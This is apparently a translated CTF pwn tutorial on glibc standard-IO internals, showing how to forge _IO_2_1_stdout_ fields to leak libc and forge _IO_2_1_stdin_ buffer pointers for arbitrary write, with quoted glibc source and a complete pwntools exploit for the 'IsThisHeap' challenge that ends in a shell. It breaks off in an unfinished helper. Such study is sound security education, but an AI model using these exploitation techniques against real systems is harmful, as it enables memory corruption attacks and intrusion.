Standard IO and Arbitrary Read/Write
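Your face is covered in dust and your body in mud; what a white-haired, lost wanderer you are.
Bet you didn't see that coming: this code monkey turns out to be a 树粉 too.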
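Standard IO basics
Standard output
A shaky foundation brings the whole building down, so I recommend that everyone settle down and actually read the source.
printf and puts use the stdout pointer near the very start of the .bss segment to locate the _IO_2_1_stdout_ FILE structure. After a series of steps they end up calling the _IO_XSPUTN entry of the vtable that _IO_2_1_stdout_ points to (normally _IO_file_xsputn in _IO_file_jumps).
The eight pointers that follow _flags in the FILE structure (_IO_buf_base and so on; you can find them in the _IO_FILE definition in the source, and for brevity I drop the "_IO_" prefix from pointer names below) matter a great deal for both input and output. They decide where data is taken from, where it is put, and where it is buffered.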
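As a quick reference for the fields named above, here is a small Python sketch of where _flags and the eight pointers sit at the head of the structure. It assumes the amd64 glibc layout (a 4-byte _flags padded to 8 bytes, followed by 8-byte pointers); the helper name field_offset is made up for illustration.

```python
# Head of struct _IO_FILE, assuming amd64 glibc:
# _flags occupies the first 8-byte slot, then eight 8-byte pointers follow.
HEAD_FIELDS = [
    "_flags",
    "_IO_read_ptr", "_IO_read_end", "_IO_read_base",
    "_IO_write_base", "_IO_write_ptr", "_IO_write_end",
    "_IO_buf_base", "_IO_buf_end",
]


def field_offset(name):
    """Return the byte offset of a head field (hypothetical helper)."""
    return HEAD_FIELDS.index(name) * 8


if __name__ == "__main__":
    for name in HEAD_FIELDS:
        print(f"{field_offset(name):#04x}  {name}")
```

Knowing these offsets is what lets a partial overwrite starting at _flags reach exactly the pointer you care about.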
About buffering
For what this buffering actually is, I suggest reading these articles:
linux IO_FILE 利用 (Linux IO_FILE exploitation)
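Standard input
Similarly, input functions locate _IO_2_1_stdin_ through stdin and then go through its vtable (_IO_file_jumps). Block reads such as fread use _IO_XSGETN (_IO_file_xsgetn), while scanf and friends typically pull characters through the underflow entry (_IO_UNDERFLOW), which _IO_file_xsgetn also falls back on when its buffer runs dry.
Of course there are also functions such as fwrite and fscanf that do not use the standard streams. They end up in the same vtable entries (_IO_XSPUTN, _IO_XSGETN and so on) of whatever FILE they are given; the only difference is that the FILE pointer passed in is not one of the standard stream pointers.
Two exceptions
Note that read and write do not go through a FILE structure. Given a file descriptor, they go straight to the corresponding system call, and the FILE structure plays no part.
The rest of this post focuses on how to get memory leaks, arbitrary address reads and similar primitives by modifying the relevant pointers in a FILE. It does not dissect the implementation of the IO machinery in depth (I'm not up to that anyway..).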
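Leaking a libc address through _IO_2_1_stdout_
To pull this off we need control over the _flags field of _IO_2_1_stdout_, and we also need to be able to tamper with the write_base pointer (at the very least, to make its low byte smaller).
My feeling is that once you have studied pwn this far, memorizing conclusions is no longer enough. If you want to go deeper you have to understand the underlying mechanics thoroughly. So, dear reader, open your copy of the glibc source and let's work through the relevant parts step by step.
First, the leak has to be triggered by a function tied to standard output, such as puts. That function calls _IO_file_xsputn; up to this point the program has paid little attention to the internals of the structure it found.
This function is actually #defined to _IO_new_file_xsputn, which is little more than a rename and makes no real difference...
The source is long, so bear with it...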
_IO_size_t
_IO_new_file_xsputn (_IO_FILE *f, const void *data, _IO_size_t n)
{
  const char *s = (const char *) data;
  _IO_size_t to_do = n;
  int must_flush = 0;
  _IO_size_t count = 0;
  if (n <= 0)
    return 0;
  /* This is an optimized implementation.
     If the amount to be written straddles a block boundary
     (or the filebuf is unbuffered), use sys_write directly. */
  /* First figure out how much space is available in the buffer. */
  if ((f->_flags & _IO_LINE_BUF) && (f->_flags & _IO_CURRENTLY_PUTTING))
    {
      count = f->_IO_buf_end - f->_IO_write_ptr;
      if (count >= n)
        {
          const char *p;
          for (p = s + n; p > s; )
            {
              if (*--p == '\n')
                {
                  count = p - s + 1;
                  must_flush = 1;
                  break;
                }
            }
        }
    }
  else if (f->_IO_write_end > f->_IO_write_ptr)
    count = f->_IO_write_end - f->_IO_write_ptr; /* Space available. */
  /* Then fill the buffer. */
  if (count > 0)
    {
      if (count > to_do)
        count = to_do;
#ifdef _LIBC
      f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
#else
      memcpy (f->_IO_write_ptr, s, count);
      f->_IO_write_ptr += count;
#endif
      s += count;
      to_do -= count;
    }
  if (to_do + must_flush > 0)
    {
      _IO_size_t block_size, do_write;
      /* Next flush the (full) buffer. */
      if (_IO_OVERFLOW (f, EOF) == EOF)
        /* If nothing else has to be written we must not signal the
           caller that everything has been written. */
        return to_do == 0 ? EOF : n - to_do;
      /* Try to maintain alignment: write a whole number of blocks. */
      block_size = f->_IO_buf_end - f->_IO_buf_base;
      do_write = to_do - (block_size >= 128 ? to_do % block_size : 0);
      if (do_write)
        {
          count = new_do_write (f, s, do_write);
          to_do -= count;
          if (count < do_write)
            return n - to_do;
        }
      /* Now write out the remainder. Normally, this will fit in the
         buffer, but it's somewhat messier for line-buffered files,
         so we let _IO_default_xsputn handle the general case. */
      if (to_do)
        to_do -= _IO_default_xsputn (f, s+do_write, to_do);
    }
  return n - to_do;
}
libc_hidden_ver (_IO_new_file_xsputn, _IO_file_xsputn)
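When this function is called, f is the address of _IO_2_1_stdout_, data is the start of the data to print, and n is the output length, either preset or computed by the caller.
Our goal is to get the program to execute this line: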
if (_IO_OVERFLOW (f, EOF) == EOF)
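To get there we need to steer clear of some unnecessary branches. Fortunately nothing up to this point causes serious trouble.
The branches contain some checks on _flags, so here are the relevant macros for reference: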
#define _IO_MAGIC 0xFBAD0000 /* Magic number */
#define _OLD_STDIO_MAGIC 0xFABC0000 /* Emulate old stdio. */
#define _IO_MAGIC_MASK 0xFFFF0000
#define _IO_USER_BUF 1 /* User owns buffer; don't delete it on close. */
#define _IO_UNBUFFERED 2
#define _IO_NO_READS 4 /* Reading not allowed */
#define _IO_NO_WRITES 8 /* Writing not allowd */
#define _IO_EOF_SEEN 0x10
#define _IO_ERR_SEEN 0x20
#define _IO_DELETE_DONT_CLOSE 0x40 /* Don't call close(_fileno) on cleanup. */
#define _IO_LINKED 0x80 /* Set if linked (using _chain) to streambuf::_list_all.*/
#define _IO_IN_BACKUP 0x100
#define _IO_LINE_BUF 0x200
#define _IO_TIED_PUT_GET 0x400 /* Set if put and get pointer logicly tied. */
#define _IO_CURRENTLY_PUTTING 0x800
#define _IO_IS_APPENDING 0x1000
#define _IO_IS_FILEBUF 0x2000
#define _IO_BAD_SEEN 0x4000
#define _IO_USER_LOCK 0x8000
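When staring at a _flags value in a debugger it helps to decode it back into these macro names. The following is a minimal Python sketch built directly from the list above; the function name decode_flags is made up for illustration, and 0xfbad2887 is used only as a sample value (one often seen on an unbuffered stdout).

```python
_IO_MAGIC = 0xFBAD0000
_IO_MAGIC_MASK = 0xFFFF0000

# Bit values copied from the macro list above.
IO_FLAGS = {
    0x1: "_IO_USER_BUF",
    0x2: "_IO_UNBUFFERED",
    0x4: "_IO_NO_READS",
    0x8: "_IO_NO_WRITES",
    0x10: "_IO_EOF_SEEN",
    0x20: "_IO_ERR_SEEN",
    0x40: "_IO_DELETE_DONT_CLOSE",
    0x80: "_IO_LINKED",
    0x100: "_IO_IN_BACKUP",
    0x200: "_IO_LINE_BUF",
    0x400: "_IO_TIED_PUT_GET",
    0x800: "_IO_CURRENTLY_PUTTING",
    0x1000: "_IO_IS_APPENDING",
    0x2000: "_IO_IS_FILEBUF",
    0x4000: "_IO_BAD_SEEN",
    0x8000: "_IO_USER_LOCK",
}


def decode_flags(flags):
    """Return the names of the flag bits set in a FILE _flags value."""
    if (flags & _IO_MAGIC_MASK) != _IO_MAGIC:
        raise ValueError("magic number missing from the upper 16 bits")
    return [name for bit, name in sorted(IO_FLAGS.items()) if flags & bit]


if __name__ == "__main__":
    for name in decode_flags(0xFBAD2887):
        print(name)
```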
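OK, back to the source above.
To be safe, avoid the first two blocks (the if-else and the if that follows it) whenever possible. In the if-else, the second half of the if condition, 0x800 (_IO_CURRENTLY_PUTTING), has to be set later on, so leave the first half, 0x200 (_IO_LINE_BUF), alone. The else branch computes count from write_end - write_ptr. Challenge binaries usually switch stdout to unbuffered mode, so the three write pointers in the FILE (base, ptr, end) all sit at the same position and count stays 0. Surprisingly, that position lies inside the FILE structure itself, at the one-byte _shortbuf field (offset 0x83 on amd64). This matters a lot, because the range we can leak later depends on these pointers: they point into libc's data segment, which is full of libc addresses.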
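To make the first if-else concrete, here is a small Python model of how _IO_new_file_xsputn computes count and must_flush. It is only a sketch of the logic in the source above: pointers are plain integers, and the function name xsputn_buffer_space is invented for this example.

```python
_IO_LINE_BUF = 0x200
_IO_CURRENTLY_PUTTING = 0x800


def xsputn_buffer_space(flags, write_ptr, write_end, buf_end, data):
    """Model the first if/else of _IO_new_file_xsputn.

    Returns (count, must_flush) exactly as the C code would leave them
    before the "Then fill the buffer" step.
    """
    n = len(data)
    count, must_flush = 0, 0
    if (flags & _IO_LINE_BUF) and (flags & _IO_CURRENTLY_PUTTING):
        count = buf_end - write_ptr
        if count >= n:
            last_newline = data.rfind(b"\n")  # the C loop scans backwards
            if last_newline != -1:
                count = last_newline + 1
                must_flush = 1
    elif write_end > write_ptr:
        count = write_end - write_ptr
    return count, must_flush


if __name__ == "__main__":
    # Unbuffered stdout: write_ptr == write_end, _IO_LINE_BUF clear.
    print(xsputn_buffer_space(0xFBAD1800, 0x1000, 0x1000, 0x1001, b"hi\n"))
```

With count equal to 0 nothing is copied into the buffer, to_do stays at n, and to_do + must_flush > 0 sends execution on to _IO_OVERFLOW.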
The second if is skipped automatically because count is already 0. Execution then enters _IO_file_overflow, which is #defined to _IO_new_file_overflow:
int
_IO_new_file_overflow (_IO_FILE *f, int ch)
{
  if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
    {
      f->_flags |= _IO_ERR_SEEN;
      __set_errno (EBADF);
      return EOF;
    }
  /* If currently reading or no buffer allocated. */
  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)
    {
      /* Allocate a buffer if needed. */
      if (f->_IO_write_base == NULL)
        {
          _IO_doallocbuf (f);
          _IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
        }
      /* Otherwise must be currently reading.
         If _IO_read_ptr (and hence also _IO_read_end) is at the buffer end,
         logically slide the buffer forwards one block (by setting the
         read pointers to all point at the beginning of the block). This
         makes room for subsequent output.
         Otherwise, set the read pointers to _IO_read_end (leaving that
         alone, so it can continue to correspond to the external position). */
      if (__glibc_unlikely (_IO_in_backup (f)))
        {
          size_t nbackup = f->_IO_read_end - f->_IO_read_ptr;
          _IO_free_backup_area (f);
          f->_IO_read_base -= MIN (nbackup, f->_IO_read_base - f->_IO_buf_base);
          f->_IO_read_ptr = f->_IO_read_base;
        }
      if (f->_IO_read_ptr == f->_IO_buf_end)
        f->_IO_read_end = f->_IO_read_ptr = f->_IO_buf_base;
      f->_IO_write_ptr = f->_IO_read_ptr;
      f->_IO_write_base = f->_IO_write_ptr;
      f->_IO_write_end = f->_IO_buf_end;
      f->_IO_read_base = f->_IO_read_ptr = f->_IO_read_end;
      f->_flags |= _IO_CURRENTLY_PUTTING;
      if (f->_mode <= 0 && f->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
        f->_IO_write_end = f->_IO_write_ptr;
    }
  if (ch == EOF)
    return _IO_do_write (f, f->_IO_write_base, f->_IO_write_ptr - f->_IO_write_base);
  if (f->_IO_write_ptr == f->_IO_buf_end ) /* Buffer is really full */
    if (_IO_do_flush (f) == EOF)
      return EOF;
  *f->_IO_write_ptr++ = ch;
  if ((f->_flags & _IO_UNBUFFERED) || ((f->_flags & _IO_LINE_BUF) && ch == '\n'))
    if (_IO_do_write (f, f->_IO_write_base, f->_IO_write_ptr - f->_IO_write_base) == EOF)
      return EOF;
  return (unsigned char) ch;
}
libc_hidden_ver (_IO_new_file_overflow, _IO_file_overflow)
The goal is to execute:
if (ch == EOF)
return _IO_do_write (f, f->_IO_write_base, f->_IO_write_ptr - f->_IO_write_base);
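_IO_do_write performs the write system call, with arguments that correspond to the ones passed to _IO_do_write. As you can see, it prints everything between write_base and write_ptr.
In unbuffered mode, write_base and write_ptr of _IO_2_1_stdout_ point by default at an address in the later part of _IO_2_1_stdout_ itself. If you overwrite the lowest byte of write_base with \x00, the printed range can grow to include the _chain field of _IO_2_1_stdout_, which leaks the address of _IO_2_1_stdin_ and therefore gives you the libc base.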
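The effect of zeroing the low byte can be checked with a little address arithmetic. The sketch below assumes the amd64 glibc layout, where an unbuffered stream's write pointers sit at the _shortbuf field (offset 0x83) and _chain is at offset 0x68; the stdout address used in the example is made up, and the helper names are hypothetical.

```python
SHORTBUF_OFF = 0x83  # _shortbuf, where unbuffered write pointers sit (amd64 assumption)
CHAIN_OFF = 0x68     # _chain, which holds the address of _IO_2_1_stdin_ for stdout


def leak_window(stdout_addr):
    """Return (write_base, write_ptr) after write_base's low byte is zeroed."""
    write_ptr = stdout_addr + SHORTBUF_OFF
    write_base = write_ptr & ~0xFF
    return write_base, write_ptr


def covers_chain(stdout_addr):
    """True if the printed range fully contains the 8-byte _chain field."""
    write_base, write_ptr = leak_window(stdout_addr)
    chain = stdout_addr + CHAIN_OFF
    return write_base <= chain and chain + 8 <= write_ptr


if __name__ == "__main__":
    stdout_addr = 0x7FFFF7FA56A0  # made-up runtime address of _IO_2_1_stdout_
    base, ptr = leak_window(stdout_addr)
    print(hex(base), hex(ptr), ptr - base, covers_chain(stdout_addr))
```

For an address ending in 0x6a0 the window starts at offset 0x60 of the structure, so the first non-zero pointer in the output is _chain. With a different low byte the window starts elsewhere and the first libc pointer you see may be a different one.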
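Again, though, we have to get past a few earlier branches to make sure execution reaches this point.
_IO_NO_WRITES is purely a matter of _flags; keep that bit clear and you're done.
The big if block after it overwrites our write pointers, which would defeat the leak, so it must be skipped. Of its two conditions, write_base == NULL is normally never true, since we have no reason to zero write_base. It is therefore enough to make the first condition false, which is again a job for _flags: light up the 0x800 bit (_IO_CURRENTLY_PUTTING).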
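The branch conditions just discussed can be summarized as a tiny decision function. This Python sketch only models which part of _IO_new_file_overflow decides the outcome when it is called with ch == EOF by default; the function name and the returned labels are invented for illustration.

```python
_IO_NO_WRITES = 0x8
_IO_CURRENTLY_PUTTING = 0x800


def file_overflow_path(flags, write_base, ch_is_eof=True):
    """Name the first decisive branch taken in _IO_new_file_overflow."""
    if flags & _IO_NO_WRITES:
        return "error"            # sets _IO_ERR_SEEN and returns EOF
    if (flags & _IO_CURRENTLY_PUTTING) == 0 or write_base == 0:
        return "reset_pointers"   # write pointers get rewritten: leak ruined
    if ch_is_eof:
        return "do_write"         # prints write_base .. write_ptr untouched
    return "store_char"


if __name__ == "__main__":
    print(file_overflow_path(0xFBAD1800, 0x7FFFF7FA5700))
```

Only the "do_write" outcome leaves our forged write_base in place when _IO_do_write is called.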
Next we enter _IO_do_write, which is #defined to _IO_new_do_write:
int
_IO_new_do_write (_IO_FILE *fp, const char *data, _IO_size_t to_do)
{
  return (to_do == 0 || (_IO_size_t) new_do_write (fp, data, to_do) == to_do) ? 0 : EOF;
}
libc_hidden_ver (_IO_new_do_write, _IO_do_write)
static
_IO_size_t
new_do_write (_IO_FILE *fp, const char *data, _IO_size_t to_do)
{
  _IO_size_t count;
  if (fp->_flags & _IO_IS_APPENDING)
    /* On a system without a proper O_APPEND implementation,
       you would need to sys_seek(0, SEEK_END) here, but is
       not needed nor desirable for Unix- or Posix-like systems.
       Instead, just indicate that offset (before and after) is
       unpredictable. */
    fp->_offset = _IO_pos_BAD;
  else if (fp->_IO_read_end != fp->_IO_write_base)
    {
      _IO_off64_t new_pos = _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
      if (new_pos == _IO_pos_BAD)
        return 0;
      fp->_offset = new_pos;
    }
  count = _IO_SYSWRITE (fp, data, to_do);
  if (fp->_cur_column && count)
    fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;
  _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;
  fp->_IO_write_end = (fp->_mode <= 0 && (fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED)) ? fp->_IO_buf_base : fp->_IO_buf_end);
  return count;
}
Here we can see the system call:
count = _IO_SYSWRITE (fp, data, to_do);
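Only one last obstacle remains: the if-else in front of it. The second branch is usually hard to avoid, because skipping it requires read_end == write_base and we rarely know the original write_base address. The first condition, however, is easy to satisfy (set 0x1000, _IO_IS_APPENDING, in _flags), and that branch merely changes the _offset field, which is harmless. So we deliberately take the first branch and thereby avoid the second.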
To sum up, our tampering with _IO_2_1_stdout_ looks like this:
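fake_file  = p64(0xfbad1800)  # _flags: _IO_MAGIC | _IO_IS_APPENDING | _IO_CURRENTLY_PUTTING
fake_file += p64(0)           # read_ptr
fake_file += p64(0)           # read_end
fake_file += p64(0)           # read_base
fake_file += b'\x00'          # lowest byte of write_base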
Modifying the head of the FILE like this is all it takes. Trigger puts afterwards; the first libc address printed is often that of _IO_2_1_stdin_.
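Turning the leaked bytes into a libc base is a matter of grabbing the first pointer that ends in 0x7f and subtracting the symbol offset. Here is a minimal sketch using only the standard library; the sample leak, the runtime address and the _IO_2_1_stdin_ offset are all made-up values, and the helper names are hypothetical.

```python
import struct


def first_libc_pointer(leak):
    """Return the first 6-byte little-endian value that ends in 0x7f."""
    end = leak.index(b"\x7f") + 1
    if end < 6:
        raise ValueError("0x7f found too early to be the top of a pointer")
    return struct.unpack("<Q", leak[end - 6:end].ljust(8, b"\x00"))[0]


def libc_base(leak, stdin_offset):
    """Subtract the (assumed) offset of _IO_2_1_stdin_ from the leaked pointer."""
    return first_libc_pointer(leak) - stdin_offset


if __name__ == "__main__":
    # Fake leak: a NULL _markers field followed by a made-up _chain value.
    leak = struct.pack("<QQ", 0, 0x7FFFF7FA4980) + b"\x01\x00\x00\x00"
    print(hex(libc_base(leak, 0x1EC980)))  # 0x1EC980 is a made-up offset
```

In a real exploit the offset comes from the libc that ships with the target, and it is worth checking that the resulting base is page-aligned.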
A typical example is IsThisHeap from NewStar 2022 week 4. BUUCTF hosts the environment for that contest. The EXP is below, and my blog also has a detailed writeup of the contest.
from pwn import *

ELFpath = '/home/wjc/Desktop/pwn'
libcpath = '/home/wjc/Desktop/libc-2.31.so'
context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
r = process(ELFpath)
libc = ELF(libcpath)
log_result = {}

# Thin wrappers around the menu of the target program
def cmd(idx):
    r.recvuntil(b'>> ')
    r.sendline(str(idx).encode())

def Add(content):
    cmd(1)
    r.recvuntil(b'Any data?')
    r.sendline(content)

def Edit(idx, content):
    cmd(3)
    r.recvuntil(b'Index:')
    r.sendline(str(idx).encode())
    r.recvuntil(b'Content:')
    r.send(content)

def Show(idx):
    cmd(4)
    r.recvuntil(b'Index:')
    r.sendline(str(idx).encode())

gdb.attach(r, 'b*0x400730')

# Step 1: overwrite the head of _IO_2_1_stdout_ as described above
fake_file = p64(0xfbad1800)
fake_file += p64(0) * 3
Edit(-8, fake_file)

# Step 2: the first 0x7f-terminated pointer in the output is _IO_2_1_stdin_
libcbase = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc.symbols['_IO_2_1_stdin_']
system_addr = libcbase + libc.symbols['system']
onegadget = libcbase + 0xe3b04
puts_addr = libcbase + libc.symbols['puts']
write_addr = libcbase + libc.symbols['write']
log_result['libcbase'] = libcbase
log_result['system'] = system_addr
log_result['onegadget'] = onegadget
log_result['puts_addr'] = puts_addr
log_result['write_addr'] = write_addr

# Step 3: second out-of-bounds edit; the index must be an integer
offset = 0x601EF0 + 8 - 0x6020E0
Add(b"/bin/sh\x00")
pay1 = p64(0x601e20) + p64(0) + p64(0) + p64(puts_addr) + p64(write_addr) + p64(system_addr)
Edit(offset // 8, pay1)
Show(0)

def LOGALL():
    log.success("***** all result *****")
    for name, value in log_result.items():
        log.success('%-20s%s' % (name + ":", hex(value)))

LOGALL()
r.interactive()
Arbitrary write through _IO_2_1_stdin_
Without further ado, here is the source first:
_IO_size_t
_IO_file_xsgetn (_IO_FILE *fp, void *data, _IO_size_t n)
{
  _IO_size_t want, have;
  _IO_ssize_t count;
  char *s = data;
  want = n;
  if (fp->_IO_buf_base == NULL)
    {
      /* Maybe we already have a push back pointer. */
      if (fp->_IO_save_base != NULL)
        {
          free (fp->_IO_save_base);
          fp->_flags &= ~_IO_IN_BACKUP;
        }
      _IO_doallocbuf (fp);
    }
  while (want > 0)
    {
      have = fp->_IO_read_end - fp->_IO_read_ptr;
      if (want <= have)
        {
          memcpy (s, fp->_IO_read_ptr, want);
          fp->_IO_read_ptr += want;
          want = 0;
        }
      else
        {
          if (have > 0)
            {
#ifdef _LIBC
              s = __mempcpy (s, fp->_IO_read_ptr, have);
#else
              memcpy (s, fp->_IO_read_ptr, have);
              s += have;
#endif
              want -= have;
              fp->_IO_read_ptr += have;
            }
          /* Check for backup and repeat */
          if (_IO_in_backup (fp)) //#define _IO_in_backup(fp) ((fp)->_flags & _IO_IN_BACKUP)
            {
              _IO_switch_to_main_get_area (fp);
              continue;
            }
          /* If we now want less than a buffer, underflow and repeat
             the copy. Otherwise, _IO_SYSREAD directly to
             the user buffer. */
          if (fp->_IO_buf_base && want < (size_t) (fp->_IO_buf_end - fp->_IO_buf_base))
            {
              if (__underflow (fp) == EOF)
                break;
              continue;
            }
          /* These must be set before the sysread as we might longjmp out
             waiting for input. */
          _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
          _IO_setp (fp, fp->_IO_buf_base, fp->_IO_buf_base);
          /* Try to maintain alignment: read a whole number of blocks. */
          count = want;
          if (fp->_IO_buf_base)
            {
              _IO_size_t block_size = fp->_IO_buf_end - fp->_IO_buf_base;
              if (block_size >= 128)
                count -= want % block_size;
            }
          count = _IO_SYSREAD (fp, s, count);
          if (count <= 0)
            {
              if (count == 0)
                fp->_flags |= _IO_EOF_SEEN;
              else
                fp->_flags |= _IO_ERR_SEEN;
              break;
            }
          s += count;
          want -= count;
          if (fp->_offset != _IO_pos_BAD)
            _IO_pos_adjust (fp->_offset, count);
        }
    }
  return n - want;
}
libc_hidden_def (_IO_file_xsgetn)
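Block-read functions that go through the IO_FILE structure, such as fread, end up in this function; character-oriented ones such as scanf typically reach the same underflow path described below by a shorter route.
On entry, the function checks whether buf_base is 0 to decide whether the buffer has been initialized. Once it is, the function looks at how much data is left in the buffer (read_end - read_ptr); if that is enough, the request is satisfied from the buffered data.
Take care to avoid the _IO_in_backup (fp) branch.
If the buffered data is not enough, whatever is left in the buffer is copied out first. The function then compares the remaining request with the buffer size (buf_end - buf_base): if the request is smaller than the buffer, it calls __underflow, which resets the buffer pointers and issues a read system call to refill the buffer. Control then returns to the top of the loop, where the freshly buffered data is copied out.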
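The decision made on each pass of the while loop can be modelled in a few lines. The Python sketch below mirrors the branch order of _IO_file_xsgetn with pointers as plain integers; it assumes read_end >= read_ptr, and the function name and returned labels are invented for illustration.

```python
def xsgetn_next_step(want, read_ptr, read_end, buf_base, buf_end, in_backup=False):
    """Name the action _IO_file_xsgetn takes for one loop iteration."""
    have = read_end - read_ptr
    if want <= have:
        return "copy_from_buffer"
    if have > 0:
        want -= have                      # leftover bytes are drained first
    if in_backup:
        return "switch_to_main_get_area"
    if buf_base and want < buf_end - buf_base:
        return "underflow"                # refill the buffer at buf_base
    return "direct_sysread"               # read straight into the caller's buffer


if __name__ == "__main__":
    # Empty buffer, small request, forged 0x100-byte buffer at 0x601000.
    print(xsgetn_next_step(8, 0, 0, 0x601000, 0x601100))
```

The takeaway for exploitation is that the forged buffer has to be larger than the number of bytes the program asks for, otherwise the read bypasses buf_base entirely.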
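__underflow calls _IO_UNDERFLOW from the vtable, which normally ends up in _IO_new_file_underflow. That function contains a sys_read that reads data into buf_base; if we can steer execution there, we get an arbitrary write to an arbitrary address.
How execution reaches _IO_new_file_underflow, and what happens inside it, is shown in the source below.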
int
__underflow (_IO_FILE *fp)
{
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
  if (_IO_vtable_offset (fp) == 0 && _IO_fwide (fp, -1) != -1)
    return EOF;
#endif
  if (fp->_mode == 0)
    _IO_fwide (fp, -1);
  if (_IO_in_put_mode (fp))
    if (_IO_switch_to_get_mode (fp) == EOF)
      return EOF;
  if (fp->_IO_read_ptr < fp->_IO_read_end)
    return *(unsigned char *) fp->_IO_read_ptr;
  if (_IO_in_backup (fp))
    {
      _IO_switch_to_main_get_area (fp);
      if (fp->_IO_read_ptr < fp->_IO_read_end)
        return *(unsigned char *) fp->_IO_read_ptr;
    }
  if (_IO_have_markers (fp))
    {
      if (save_for_backup (fp, fp->_IO_read_end))
        return EOF;
    }
  else if (_IO_have_backup (fp))
    _IO_free_backup_area (fp);
  return _IO_UNDERFLOW (fp);
}
libc_hidden_def (__underflow)
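As we can see here, conditions such as read_ptr < read_end and _IO_in_backup (fp) were already taken care of in _IO_file_xsgetn, so everything that needs to be avoided is avoided. _IO_have_backup (fp) requires (fp)->_IO_save_base != NULL and _IO_have_markers (fp) requires (fp)->_markers != NULL; keep those two fields NULL and they cause no trouble either.
Let's step into _IO_new_file_underflow and take a look: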
int
_IO_new_file_underflow (_IO_FILE *fp)
{
  _IO_ssize_t count;
#if 0
  /* SysV does not make this test; take it out for compatibility */
  if (fp->_flags & _IO_EOF_SEEN)
    return (EOF);
#endif
  if (fp->_flags & _IO_NO_READS)
    {
      fp->_flags |= _IO_ERR_SEEN;
      __set_errno (EBADF);
      return EOF;
    }
  if (fp->_IO_read_ptr < fp->_IO_read_end)
    return *(unsigned char *) fp->_IO_read_ptr;
  if (fp->_IO_buf_base == NULL)
    {
      /* Maybe we already have a push back pointer. */
      if (fp->_IO_save_base != NULL)
        {
          free (fp->_IO_save_base);
          fp->_flags &= ~_IO_IN_BACKUP;
        }
      _IO_doallocbuf (fp);
    }
  /* Flush all line buffered files before reading. */
  /* FIXME This can/should be moved to genops ?? */
  if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
    {
#if 0
      _IO_flush_all_linebuffered ();
#else
      /* We used to flush all line-buffered stream. This really isn't
         required by any standard. My recollection is that
         traditional Unix systems did this for stdout. stderr better
         not be line buffered. So we do just that here
         explicitly. --drepper */
      _IO_acquire_lock (_IO_stdout);
      if ((_IO_stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF)) == (_IO_LINKED | _IO_LINE_BUF))
        _IO_OVERFLOW (_IO_stdout, EOF);
      _IO_release_lock (_IO_stdout);
#endif
    }
  _IO_switch_to_get_mode (fp);
  /* This is very tricky. We have to adjust those
     pointers before we call _IO_SYSREAD () since
     we may longjump () out while waiting for
     input. Those pointers may be screwed up. H.J. */
  fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
  fp->_IO_read_end = fp->_IO_buf_base;
  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end = fp->_IO_buf_base;
  count = _IO_SYSREAD (fp, fp->_IO_buf_base, fp->_IO_buf_end - fp->_IO_buf_base);
  if (count <= 0)
    {
      if (count == 0)
        fp->_flags |= _IO_EOF_SEEN;
      else
        fp->_flags |= _IO_ERR_SEEN, count = 0;
    }
  fp->_IO_read_end += count;
  if (count == 0)
    {
      /* If a stream is read to EOF, the calling application may switch active
         handles. As a result, our offset cache would no longer be valid, so
         unset it. */
      fp->_offset = _IO_pos_BAD;
      return EOF;
    }
  if (fp->_offset != _IO_pos_BAD)
    _IO_pos_adjust (fp->_offset, count);
  return *(unsigned char *) fp->_IO_read_ptr;
}
libc_hidden_ver (_IO_new_file_underflow, _IO_file_underflow)
Our target statement is
count = _IO_SYSREAD (fp, fp->_IO_buf_base, fp->_IO_buf_end - fp->_IO_buf_base);
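(It is easy to see that the read and write buffer pointers in the FILE are all reassigned around this statement.)
On entering the function we get the usual flag check, then a comparison of read_ptr with read_end (already dealt with before entering the function) and a check on whether the buffer has been initialized (whether buf_base is NULL).
The fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED) branch below is again best avoided; you can't really keep track of what _IO_OVERFLOW (_IO_stdout, EOF) will end up doing.
After that comes the sys_read itself, which is what we are after.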
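The checks that stand between the function entry and the sys_read can be condensed into a small model. This Python sketch returns the address and size that would be handed to _IO_SYSREAD, or None when one of the early exits fires; the function names are made up, and only the conditions visible in the source above are modelled.

```python
_IO_UNBUFFERED = 0x2
_IO_NO_READS = 0x4
_IO_LINE_BUF = 0x200


def underflow_sysread_args(flags, read_ptr, read_end, buf_base, buf_end):
    """Return (address, size) given to _IO_SYSREAD, or None if we never
    get there with our own buf_base."""
    if flags & _IO_NO_READS:
        return None          # EBADF path
    if read_ptr < read_end:
        return None          # a buffered byte is returned, no read happens
    if buf_base == 0:
        return None          # _IO_doallocbuf would choose its own buffer
    return buf_base, buf_end - buf_base


def touches_stdout(flags):
    """True if the 'flush stdout first' branch would be entered."""
    return bool(flags & (_IO_LINE_BUF | _IO_UNBUFFERED))


if __name__ == "__main__":
    print(underflow_sysread_args(0xFBAD1800, 0, 0, 0x601000, 0x601100))
    print(touches_stdout(0xFBAD1800))
```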
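So the overwrite plan is as follows:
- Set _flags to 0xfbad1800. It is the same value as for stdout, so it is easy to remember.
- read_ptr must equal read_end; simply zero all the read pointers.
- Zero the three write pointers too. They are not needed, and since they are all refreshed once the read completes there are no side effects to worry about.
- Use buf_base and buf_end to frame the memory to be written: buf_base points to the start and buf_end to the end.
There are other conditions to watch out for, but they generally cause no trouble.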
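The plan above can be written down as a payload builder. The sketch below uses only the standard library and assumes the amd64 layout (nine 8-byte slots from _flags to buf_end) and a write primitive that starts at the beginning of _IO_2_1_stdin_; the function name and the target address in the example are made up.

```python
import struct


def stdin_write_payload(target, size, flags=0xFBAD1800):
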